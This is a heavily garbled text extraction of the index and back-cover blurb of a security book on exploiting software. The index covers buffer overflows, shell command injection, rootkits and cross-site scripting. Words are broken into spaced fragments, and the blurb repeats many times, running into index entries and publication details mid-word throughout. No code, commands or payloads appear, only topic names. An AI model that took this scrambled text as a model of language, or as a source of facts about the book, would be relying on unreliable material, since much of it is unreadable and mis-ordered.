How in d oes sof areentbr n onscr ip tt w elem s eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew wit alls, russion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? h in int script What t ools be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. env iron mentcan var iables for buf fer ov er flow

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d man ip ulat ing t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om escaped slash es in alt er nat e enco din g at t ex ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . ecut able code in non ex ecu tab le files filt er f ailu re t h rough bu ff er ov erflow

This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he glo bal variables scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t HTTP cook ies

HTTP query st rin gs in -ban d swit chting Why sof w arsignals e ex ploit

w ill con t inue t o be a ser ious p r oblem

local com ma nd- lin e ut ilit ies fo r bu ff er overflow local f ilen ames o fu nctit ions pectin g URLs When netpassed w or k tsecur y mexech anisms

do n ot w or k

lock picks in metAt a-ch aractpat ers tinere-ns mail headers t ack MI ME con ver sion

engineer inescapes g mu ltRev iple er pa se rsers an d d ouble open -sy st em s v iew 2nd 3rd 4t h 5t h 6t h

Classic at t acks param et er ex pan sion

ag ainst serv er soft w ar e

post fix NULL t erm inat ors

Sur pr ising at t acks ag ainst clien t soft war e

program s wr it in g t o privileged OS r esou rces relat iv e pat h t rav ersal

Tech niqu es f or cr aft ing m aliciou s inpu t

session I Ds, resource I Ds, and blind tr ust s simple script inj ect io n

The t echn ical det ails of b uf fer ov er f low s

slashes in alt erna te en coding 2nd str ing form atsoverf lo w in syslog Root k it tax on omy of 2nd 3rd 4t h

tr ust Ex p lo i in t in2nd g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak unicode soft w ar e.encoding URL encodin g 2nd user-cont rolled f ilen ames user-supplied v ariables passed t o file sy st em calls UTF-8 encod in g var iab le and t ag overf lo w web logs web server m isclassifica tion XSS in HTTP h eaders

At tack signat u res 2nd 3rd At tacker def ined 2nd hiding iden t ity of 2nd in at t ack pat tern s 2nd in t en t ion viewpoint Audit logs

• •

Table of Content s

poisoning 2nd

I ndex

tr unca tion of Expl oit ing Softw a re How to Br e ak Code Audit ing By Gr egom Hoglund McGr aw4t h 5t h 6t h 7t h 8t h 9t h 10t h aut atic and, Gar bu lky 2nd 3rd for direct ly execu ta ble files hum bestAddison at Pubans lish er: Wesley Aut hen Pubticat Dation e: February 17, 200 4 mu lt iple pa th s of I SBN: 0- 20 1- 786 95 -8 session Pages: 51 2 Aut om at ed at t ack s Aut om at ic au ditin g 2nd 3rd 4t h 5t h 6t h 7t h 8t h 9t h 10t h AUTORUN.I NF file 2nd

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

[ SYMBOL] [ A] [ B ] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R] [ S] [ T] [ U] [ V] [ W ] [ X] [ Z ] Babbage, Char les Back doors from wor ms hist ory of in at t ack pat tern s



in f lash ROMTable of Content s



in ou t sourcedI ndex sof twa re

on Expl oitTFTP ing Softw a re How to Br e ak Code on X Windows By Gr eg Hoglund , Gar y McGr aw prevalence of Back slashes (\ ) PubNu lish Addison for ll er: t er mina tor s Wesley Dat e: inPub alt erna te February en coding 17, 2nd200 3rd4 in sh ell I SBN: com0man 20 d 1-in 786 ject 95ion -8 Back t racing 2nd513rd Pages: 2 Backwash at t acks Bad soft ware 2nd Bad Soft ware (Kanar an d Pels) Baggage h andlin g sy st ems Banks, at t ack s o n

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are Bat ch analysis wit h I DA-Pro 2nd 3rd 4t h 5t h 6t h 7t h 8t h fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? be in st ruct ion What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. BGP (Bord er Gat eway Prot ocol) han dlers Big endian by t e or der in g

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d in MI PS processors t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om endian at t vs. acklit, t le y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Binary files overf This m low ust in - h2nd ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he pat ching 2nd scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t NT k ern el 2nd 3rd 4t h 5t h 6t h 7t h 8t h 9t h 10t h 11t h 12t h peeph ole pat ches 2nd 3rd

Why sofndt winar eion exfo ploit ill shell com ma ject r 2nd w 3rd

con t inue t o be a ser ious p r oblem

Binary flags for st at e

When w orink BI ND, buf fer ovnet erflows

secur it y m ech anisms do n ot w or k

Biological def en se m odels

At t ory ack BI OS mem

pat t er ns

Black box analysis

Rev er se engineer in g

for reverse engineering 2nd lim it at ion s of

Classic at t acks ag ainst serv er soft w ar e

vs. wh it e box an alysis Black list s

Sur pr ising at t acks ag ainst clien t soft war e

for inpu t vs. Tech wh it e niqu list s 2nd es

f or cr aft ing m aliciou s inpu t

Black Hat secu rit y con ference Blast er The wormt echn ical

det ails of b uf fer ov er f low s

Blin d t ru st 2nd blt zal inRoot st ructkion it s Blue box es 2nd 3rd

Ex p lo i ts in S o fterw2nd a re3rdis f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak Blueprint forgdisast soft arruction e. bnel w inst Boot disk at tacks Border Gat eway Pro tocol ( BGP) han dlers Boron t ags check ing for 2nd for securit y in bu ff er overf lo w in co de t racing Branch delay

Branch es in AI X/ Po werPC 2nd on PA- RI SC 2nd Bray, Br andon Breakp oint s for inpu t pat h t racing 2nd in rev erse eng in eer in g 2nd 3rd 4t h

• •

in ru nt im e t racing 2nd

Table of Content s

memo ry page

I ndex

Browsing direct ories 2nd Expl oit ing Softw a re How to Br e ak Code Brut e f orcin g session I Ds By Gr dist eg Hoglund Gar y McGr BSD ribut ion, ,ar it h met ic praw oblem s in 2nd Buf fer overf low 2nd 3rd 4t h audit t ruer: ncatAddison ion an dWesley f ilt ers wit h Pub lish cont -be:ased 2nd 3rd Pubent Dat February 17, 200 4 from ar ith met ic err ors 2nd 3rd 4t h 5t h 6t h I SBN: 0- 20 1- 786 95 -8 from en viron men t variables 2nd 3rd Pages: 51 2 from f orm at st rin gs 2nd 3rd 4t h 5t h 6t h 7t h from m ult iple operat ion s from pa ramet er ex pan sion get s for heap overf lows 2nd 3rd 4t h 5t h

How d ND oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are in BI fir ew alls, int3rd ru sion in C+ + 2nd 4t h 5tdet h 6tect h 7tion h 8t hsy 9tst h em 10t hs, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools sed t o b reak soft war e? Th is book p rov ides t he answ er s. in client softcan war ebe 2ndu3rd in dat aba ses 2nd

Ex in p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d dom ain nam e serv ers t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om in em bedded sy st em s 2nd 3rd 4t h at t in ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . h elpctr .ex e 2nd 3rd 4t h 5t h in Java 2nd 3rd

This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he in ject ion vector s in 2nd 3rd 4t h 5t h 6t h scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t kern el

payload s in 2nd 3rd 4t h 5t h 6t h 7t h 8t h pot en t ial sour 2nd Why sofces t w ar e 3rd ex ploit

w ill con t inue t o be a ser ious p r oblem

Prolog/ Epilog cod e for 2nd 3rd 4t h 5t h 6t h securit y ch eck s for When net w or k

secur it y m ech anisms do n ot w or k

sta ck ov erflow 2nd 3rd 4t h 5t h 6t h 7t h 8t h 9t h 10t h 11t h sta te ion in Atcorru t ackptpat t er2nd ns tr ampolin in g wit h [ See Tram poline att ack ]

er2nd se two-Rev st age

engineer in g

Buf fers

at t acks agion ainst key Classic board, ch aract er in ject in

serv er soft w ar e

shared, leaking dat a in 2nd 3rd

Sur pr ising at t acks ag ainst clien t soft war e

tr acing

Bug inst ant iat ions Bugs

Tech niqu es f or cr aft ing m aliciou s inpu t

def ined

The t echn ical det ails of b uf fer ov er f low s

in open -sy st ems v iew

per Root t hou sand k it slines of code 2nd 3rd rep ort s an d f ixes, as v uln era bilit y sources Bugt Ex praq lo ima t inilin g gSlist o ft w

a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak Building soft w arSecu e. re Sof twa re (Viega a nd McGraw) 2nd 3rd 4t h 5t h 6t h Bulk au dit in g 2nd 3rd 4t h 5t h 6t h 7t h 8t h 9t h 10t h bulk_ audit _spr in t f. idc script 2nd 3rd 4t h 5t h Burn ing out h ardware Busin ess sof t ware bv in st ruct ion Byt e code disassem blers Byt e operat io ns in rev ersing parser code 2nd

wit h poin ters



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R] [ S] [ T] [ U] [ V] [ W ] [ X] [ Z ] C and C+ + lan guage buf fer o verf low in escape codes in ex ploit ex am ple 2nd 3rd 4t h 5t h 6t h 7t h 8t h 9t h for Jav a 2nd



str ing handlinTable g rou tof ines in Content s



vt ables

I ndex

C5 (CCI TT-5Softw ) signaling syst em 2nd Expl oit ing a re How to Br e ak Code Call h ooking By Gr eg Hoglund , Gar y McGr aw for back t racing 2nd 3rd for hiding processes Pubred lishpoin er: tAddison Wesley for in g Pub Dat e:ingFebruary 200 42nd 3rd 4t h for remov process 17, records I DTs I SBN: 0- 20 1- 786 95 -8 str uct ur e of 51 2nd Pages: 2 system calls Call stacks fo r dead ends and run out s Call t h rough s, regist ers f or can _read fu nct ion 2nd Can ary values 2nd 3rd

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are def eat in g fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? for buf fer ov er flow att ack s 2nd What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Car engine cont rol codes

Carriage ret urns in shell comm and inj ection

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Cascad e int errupt t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om Cat egories of subv ersive code at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . CCI TT- 5 (C5 ) signaling syst em 2nd CD-ROM images 2nd This m ust - h ave Cellular es scr ipt kphon id die

book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he t r eat m en t f ound in m any hack ing book s, you w ill learn abou t

CesarFTP ser ver CFEXECUTE t ag

Why t w Iar e ex ploit con t inue CFI ( Com mon sof Flash n terf ace) for chwipilldet ect ion 2nd t o

be a ser ious p r oblem

cgi program s

Whenicatnet or k misclassif ionwwith

secur it y m ech anisms do n ot w or k

wit h Web serv ers

t ack Cha os tAt heory

pat t er ns

Cha ract er con v ersio ns

Rev er se engineer in g

in equ iv alent request s 2nd 3rd 4t h in rev ersing parser code

Classic at t acks ag ainst serv er soft w ar e

Cha ract er inj ect ion 2nd 3rd Cha ract er set s, ho stile

Sur pr ising at t acks ag ainst clien t soft war e

Cha t client s f or back t race code 2nd ch eck_ boron fu nct ion Tech niqu es 2nd f or

cr aft ing m aliciou s inpu t

ch eck _ password fu nct ion ch eck_ tar gett_echn for_ st ical ring fu nct ails ion 2nd The det of 3rd b uf fer

ov er f low s

Check ed b uild env iron ment Check su Root ms for k itpay s loads 2nd Chippin g ca rs

Ex p lodet i t ect in g o ft3rd w a4treh is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak Chips, ingS2nd soft ar e. CI H vw irus 2nd 3rd 4t h 5t h 6t h Cisco rout ers, bu ff er overf lo w in 2nd Classif icat io n in at t acks 2nd of subv ersiv e code Client so ft ware 2nd assum pt ions in 2nd buf fer o verf lows on 2nd 3rd cont ent -b ased at t ack s o n 2nd

cross- site script ing 2nd 3rd 4t h 5t h dat abase honeypot s in 2nd 3rd in -ban d sig nals for 2nd 3rd 4t h 5t h 6t h 7t h 8t h in visib ilit y of script s an d m alicious code wit h 2nd 3rd 4t h 5t h 6t h 7t h 8t h 9t h 10t h 11t h 12t h ser ver cont rol of 2nd Code a ddress t arg et s for inj ect io n v ect ors 2nd



Table of Content s



I ndex

Code coverag e

for reverse engineering 2nd Expl oit ing Softw a re How to Br e ak Code in ru nt im e t racing By Gr egls Hoglund , Gar too f or 2nd 3rd 4tyh McGr 5t h 6taw h 7t h Code p ath s in FTP servers 2nd CodePub Red worm 2nd lish er: Addison Wesley CodePub t ra cing 3rd Dat e:2nd February 17, 200 4 API calls I SBN: 0- 20 1- 786 95 -8 back tr acing 2nd 3rd Pages: 51 2 boron t agging in buf fers dead ends and ru nout s in in serv er soft ware 2nd 3rd 4t h 5t h 6t h leapf roggin g in 2nd

How d oes sof tbreakpo w are br memo ry page in t seak in ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, ex intecut ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? program ion flow 2nd What t ools runt im e 2ndcan be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Code-sig ning errors in Java

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Cold Fu sion, CFEXECUTE inj ect ion in tCom echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om bined a tt ack s wit h equ ivalent request s 2nd at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Com man d an d cont rol act ivit ies Com man d-lin e param eters

This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he for execu ta ble files scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t for set uid

Com man ds and comm and lines buf fer o verf lowt w f rom 3rd Why sof ar e2nd ex ploit

w ill con t inue t o be a ser ious p r oblem

delim iters in 2nd 3rd in inWhen put

net w or k secur it y m ech anisms do n ot w or k

in JVMs in ject [ Seepat Shell Ating t ack t ercom ns m and inject ion ] sepa rat ors in

Rev er in gsy st em s in Com mercial sy se st emengineer s, emb edded Com mon Flash I n terf ace ( CFI ) for ch ip det ect ion 2nd

Classic t acks ag(CRL) ainst Com mon Ru nt imeatLan guage

serv er soft w ar e

Com mu nicat ions sy st ems

Sur pr ising at t acks ag ainst clien t soft war e

em bedded sy st ems in in so ft ware

Tech niqu es f or cr aft ing m aliciou s inpu t

COMP. RI SKS mailing list

Com piler f law 2nd 3rd 4t h 5t h 6t h 7t h 8t h 9t h

The t echn ical det ails of b uf fer ov er f low s

Com plex com put at ional system s Com plexit y k it s Root of comp ut er m odels soft Ex of p lo i tware in g 2nd S o ft w

a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak Com ponent soft w ar e.- based soft ware fut u re of log ically dist ribut ed sy st em s f or Com ponent s in at ta ck pat t erns 2nd Com put at ion, f ut u re of 2nd Com put er scien ce t heory 2nd Com put er Secur ity I nst it ut e ( CSI ) surv ey Com put er-Relat ed Risks (Neu ma nn) Con cept v ir us

Con dit ion al bran ches, co de cov erage t ools for 2nd Con figur ation f iles for elev at ed priv ilege sear ch pat hs in ser ver soft war e t rust in 2nd 3rd 4t h 5t h Con nect ivit y of soft ware 2nd Con ten t- based a tt ack s

• •

buf fer o verf low 2nd 3rd

Table of Content s

on clien t sof twa re 2nd

I ndex

Con tex t s f or th reads 2nd Expl oit ing Softw a re How to Br e ak Code con tin ue comm and By Grtreg Con act Hoglund sof t ware, Gar y McGr aw backdoors in fut u re ofer: 2nd Pub lish Addison Wesley Con trPub ol codes Dat e: February 17, 200 4 for clien t sof t ware 2nd I SBN: 0- 20 1- 786 95 -8 for t er mina ls 2nd Pages: 51 2 Con tr oller chips, k ey board Con version s ASCI I char t 2nd 3rd charact er 2nd 3rd 4t h 5t h MI ME

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are Cookies fir ew intI Ds ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? for alls, session What ools overft low in can 2nd be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Coprocessor in terr upt

Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d Copy p rot ection sch emes t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om and reverse en gineering at t deco ack mpiling , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Copyright law

This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t

Copyright mech anism s, pat chin g Corru pt ing

log f iles sta tes 2nd sof t w ar e Why

ex ploit w ill con t inue t o be a ser ious p r oblem

Covert com m unicat ion Cowan ,When Crispin net 2nd w 3rd or k

secur it y m ech anisms do n ot w or k

CPU regist ers ex am Atining t ack2nd pat t er ns for boron t ags 2nd

er se in g in inRev ject ion vectengineer ors 2nd in MI PS

Classic in SPARC

at t acks ag ainst serv er soft w ar e

Cracking t ools

Sur pr ising at t acks ag ainst clien t soft war e

Craf t ed inpu t 2nd 3rd

audit poiso ning wit h 2nd

Tech niqu es f or cr aft ing m aliciou s inpu t

code t racin g f or 2nd 3rd 4t h 5t h 6t h 7t h def ending again st 2nd

The t echn ical det ails of b uf fer ov er f low s

equ ivalen t request s in [ See Equ iv alen t inpu t an d requ est s] filt erRoot s f or k2nd it s I DSs for 2nd 3rd 4t h 5t h misclassif Ex p lo i t in gicatSion o ftinw2nd a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak part ition an alysis in 2nd 3rd soft w ar e. rev ersin g parser code 2nd 3rd 4t h 5t h 6t h 7t h 8t h 9t h 10t h Creat eFile f un ct ion Cross-sit e scr ipt in g [ See XSS (cro ss-sit e script in g)] CRT_ I NI T fu nct ion Cry pt ograph y in geograph ically dist ribut ed sy st em s Cry pt ot roj an att acks CSI ( Com put er Secur it y I nst it ut e) surv ey CVE vu lnerabilit ies cat alog

CWD ( Curren t Working Direct ory) for serv er s red ir ect ion wit h Cy berCop too l



Table of Content s



I ndex

Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Ex p lo i t in g S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t Why sof t w ar e ex ploit w ill con t inue t o be a ser ious p r oblem When net w or k secur it y m ech anisms do n ot w or k At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

[ SYMBOL] [ A] [ B] [ C] [ D ] [ E] [ F] [ G] [ H ] [ I ] [ J] [ K ] [ L] [ M] [ N] [ O ] [ P] [ Q ] [ R] [ S] [ T] [ U] [ V] [ W ] [ X] [ Z ] Damag e pot ent ial in open- sy st em s view 2nd Dat a blocks in in ject ion vecto rs Dat a bom bs Dat a ch ains, ch aract er conversion in Dat a collect ion by su bversiv e code Dat algoritof h ms, pu blishing • a encr ypt ion Table Content s Dat ov erf low in 2nd 3rd • a f iles, bu ff erI ndex Dat a oit leaking in sh ared b uff ers 3rd Code Expl ing Softw a re How to 2nd Br e ak Dat a sect ions f or pay loads 2nd By Gr eg Hoglund , Gar y McGr aw Dat abase bu ff er overflows 2nd Dea d ends in code t racin g er:forAddison Wesley Dea dPub listlish ings inpu t pat h t racin g PublogDat 17, 200 4 Deb ug s f e: or February h elpct r.exe debug. exe I SBN: program 0- 20 12nd 786 3rd 95 -8 Deb ugging and 51 debugg ers Pages: 2 for binary file bu ild in g 2nd 3rd for reverse engineering 2nd 3rd 4t h 5t h mu lt it hr eadin g pr ogram s 2nd 3rd 4t h root kit s as too ls f or

How d oes sof t w are br eak ? How do at t acker s m ake sof t w ar e br eak on p ur pose? Why are decode f un ct ion 2nd 3rd fir ew alls, int ru sion det ect ion sy st em s, and ant iv ir us soft war e n ot k eep in g out t he bad g uy s? Decompiler What t ools can be u sed t o b reak soft war e? Th is book p rov ides t he answ er s. Decompiling 2nd

3rd 4t h 5t h Ex helpct p lo i tr.ex in ge 2nd S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d in rev erse eng in eer in g t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om Def erred pr ocedure calls ( DPCs) at t ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . Delay slot Delay e em bedding This ed m coordinat ust - h ave book m ay Delim 4t h m en t scr iptit ers k id2nd die3rd t r eat

shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he f ound in m any hack ing book s, you w ill learn abou t

Den ial-of -service pr oblem s Den ver I n tern at ional Airpor t baggage han dlin g syst em

Why vulnerabilit sof t w ar eiesex2nd ploit Desig n-level

w ill con t inue t o be a ser ious p r oblem

Destin at io n b uff ers in h elpctr .ex e 2nd 3rd

When w packets or k secur Desyn chron izat net ion of 2nd it y

m ech anisms do n ot w or k

Det ect ing

At2nd t ack chips 3rdpat 4t ht er ns code problem s

Rev er se engineer in g

root kit s

Dev eloping Windows NT Dev ice Driv ers ( Dek k er an d Newcomer)

Classic at t acks ag ainst serv er soft w ar e

Dev ice driv ers [ See Drivers] DialogProc fu nct ion

Sur pr ising at t acks ag ainst clien t soft war e

Digital Millenniu m Copyright Act (DMCA) 2nd Digital Tech right s niqu ma nagemen lim it ation es f ort,cr aft ing smo faliciou s

inpu t

Digital t radecraf t 2nd 3rd Dir comThe m andt echn ical

det ails of b uf fer ov er f low s

Direct access t o ex ecut able f iles 2nd Directo Root ries k it s browsing 2nd

Ex hiding p lo i t in S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak 2ndg 3rd softper w mission ar e. s on red ir ect in g Disabling Win dows system f ile prot ect ion Disasm f unct ion Disassembly 2nd 3rd for buf fer ov er flow 2nd in rev erse eng in eer in g 2nd 3rd Discrimin at or digit s in phon e syst em s Disk access, ro otk it s for 2nd

Disk con tr oller int errup t Dist ribut ed sy st ems 2nd Diversion s by I DSs DLL f iles and fon ts buf fer o verf lows f rom DMCA ( Digit al Millen nium Copyr ight Act ) 2nd Domain n ame ser vers (DNS)

• •

Table of Content s

buf fer o verf lows in

I ndex

in at t ack pat tern s Expl oit ing Softw a re How to Br e ak Code in sh ell com man d in ject ion By eg IHoglund , Gar y McGr aw DotGr less P addresses Double escap es in shell co mm and inj ect ion DPCsPub ( deferred procedurWesley e calls) lish er: Addison Dr. Wat f ile Pubson Datlog e: February 17, 200 4 Dr. Wat son ut ilit y 2nd I SBN: 0- 20 1- 786 95 -8 DrainOut pu tBu ff er f unct ion 2nd Pages: 51 2 DrawGLScene f un ct io n Drip-scans DriverEnt ry f un ct ion 2nd 3rd 4t h 5t h 6t h 7t h Drivers filt er 2nd

How oesel sof for d kern roottkw it sare 2nd br 3rdeak 4t h?5tHow h 6t h do 7t h at 8t ht acker s m ake sof t w ar e br eak on p ur pose? Why are fir ew sion ion2nd sy st for alls, Troj anint ex ru ecut able det redirect ection 3rdem 4t hs,5tand h 6t h ant iv ir us soft war e n ot k eep in g out t he bad g uy s? What t ools can bein u in rev erse eng in eer g sed t o b reak soft war e? Th is book p rov ides t he answ er s. net work su pport f or 2nd 3rd 4t h 5t h 6t h 7t h 8t h 9t h 10t h

Ex program p lo i t insgu sing S o ft w a re is loaded w it h ex amp les of r eal at t ack s, at t ack pat t er ns, t ools, an d 2nd t echniqu es used by bad guy s t o br eak sof t w ar e. I f y ou w ant t o p rot ect y our sof t w ar e fr om reg isterin g 2nd 3rd at t str ack , y ou m u st fir st lear n h ow r eal at t acks are really carr ied ou t . uct ur e of 2nd unloada ble 2nd

This m ust - h ave book m ay shock y ou—and it will cer t ainly educat e y ou. Get t ing bey ond t he scr ipt k id die t r eat m en t f ound in m any hack ing book s, you w ill learn abou t

Dum b t erm inals dum pbin ut ilit y

Dum ping mem ory 2nd Dyn am Why ic execu t ion poploit in t ing sof t wfor arred e ex

w ill con t inue t o be a ser ious p r oblem

Dyn am ic j um p t ables f or payloads 2nd dynin stAPI t ool net w or k When

secur it y m ech anisms do n ot w or k

At t ack pat t er ns Rev er se engineer in g Classic at t acks ag ainst serv er soft w ar e Sur pr ising at t acks ag ainst clien t soft war e Tech niqu es f or cr aft ing m aliciou s inpu t The t echn ical det ails of b uf fer ov er f low s Root k it s Ex p lo i t in g S o ft w a re is f illed wit h t h e t ools, con cept s, and kn ow ledg e necessar y t o b reak soft w ar e.

